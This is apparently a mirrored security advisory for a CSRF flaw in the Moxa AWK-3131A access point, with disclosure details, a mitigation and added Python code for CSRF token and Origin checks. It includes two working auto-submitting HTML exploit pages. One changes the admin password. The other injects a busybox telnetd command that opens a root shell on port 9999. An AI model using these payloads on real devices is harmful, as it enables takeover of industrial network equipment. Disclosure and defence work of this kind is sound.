Moxa AWK-3131A Web Application Cross-Site Request Forgery Vulnerability (CVE-2016-8718)

2017-09-20T00:00:00
ID SSV:96541
Type seebug
Reporter Root
Modified 2017-09-20T00:00:00

Description

Summary

An exploitable Cross-Site Request Forgery vulnerability exists in the Web Application functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. A specially crafted form can trick a client into making an unintentional request to the web server which will be treated as an authentic request.

Tested Versions

Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client 1.1

Product URLs

http://www.moxa.com/product/AWK-3131A.htm

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Details

An exploitable Cross-Site Request Forgery (CSRF) vulnerability exists in the Web Application functionality of the Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client. A specially crafted form can trick a client into making an unintentional request to the web server, which will be treated as an authentic request. Successful exploitation of this vulnerability can enable an attacker to trick a legitimate user into performing any action permitted by the device, including exploitation of unrelated vulnerabilities. For example, an attacker may use a CSRF attack to modify device settings or even take advantage of OS Command Injection vulnerabilities to execute operating system commands with root privileges.

Exploit Proof-of-Concept

The below will change the user's password to a value determined by the attacker:

```
<html>
<body>
<form action="http://<device IP>/forms/webSetUserChgPwd" method="POST">
  <input type="hidden" name="NowPasswd" value="root" />
  <input type="hidden" name="Passwd" value="hacked" />
  <input type="hidden" name="ConfPasswd" value="hacked" />
  <input type="hidden" name="Submit" value="Submit" />
  <input type="hidden" name="UserName" value="admin" />
  <input type="hidden" name="bkpath" value="/Password.asp" />
  <input type="submit" value="Submit request" />
</form>
<script>
  document.forms[0].submit();
</script>
</body>
</html>
```

Alternatively, leveraging an OS Command Injection vulnerability in conjunction with CSRF, a client which attempts to render the below page will cause a root-level shell to be opened on the vulnerable device:

```
<html>
<body>
<form action="http://<device IP>/forms/webSetPingTrace" method="POST">
  <input type="hidden" name="srvName" value="; /bin/busybox telnetd -l/bin/sh -p9999" />
  <input type="hidden" name="option" value="0" />
  <input type="hidden" name="bkpath" value="/ping_trace.asp" />
  <input type="submit" value="Submit request" />
</form>
<script>
  document.forms[0].submit();
</script>
</body>
</html>
```

Mitigation

To significantly mitigate the risk of exploitation, disable the web application before the device is deployed.
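As an added illustration, not code from Talos or Moxa, of the server-side control whose absence makes the requests above forgeable: a per-session synchronizer token combined with Origin/Referer validation in front of the password-change endpoint. The device address and the `csrf_token` field name are assumptions made for the demo.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed device origin (documentation address) and the endpoint named in the advisory.
DEVICE_ORIGIN = "http://192.0.2.10"
CHANGE_PW_PATH = "/forms/webSetUserChgPwd"


def issue_csrf_token(session):
    """Mint an unguessable per-session synchronizer token; the page embeds it in each form."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def _same_origin(headers):
    """Accept only if Origin (or, failing that, Referer) names the device itself."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False  # browsers send Origin on cross-site POSTs, so absence is a reject
    got, want = urlsplit(src), urlsplit(DEVICE_ORIGIN)
    return (got.scheme, got.netloc) == (want.scheme, want.netloc)


def check_state_changing_post(headers, form, session):
    """Return (accepted, reason). Both checks must pass; the token compare is constant-time."""
    if not _same_origin(headers):
        return False, "cross-origin request rejected"
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return False, "missing or invalid CSRF token"
    return True, "accepted"


def demo():
    """Constructed requests: one as a foreign page would submit it, one from the device's own UI."""
    session = {"user": "admin"}
    token = issue_csrf_token(session)
    forged = check_state_changing_post(
        {"Origin": "http://attacker.example"},
        {"NowPasswd": "root", "Passwd": "hacked", "ConfPasswd": "hacked", "UserName": "admin"},
        session)
    legit = check_state_changing_post(
        {"Origin": DEVICE_ORIGIN},
        {"NowPasswd": "root", "Passwd": "n3w-pass", "ConfPasswd": "n3w-pass",
         "UserName": "admin", "csrf_token": token},
        session)
    return {"forged": forged, "legit": legit}
```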

Timeline

  • 2016-11-14 - Vendor Disclosure
  • 2017-04-10 - Public Release

CREDIT

  • Discovered by Patrick DeSantis of Cisco Talos.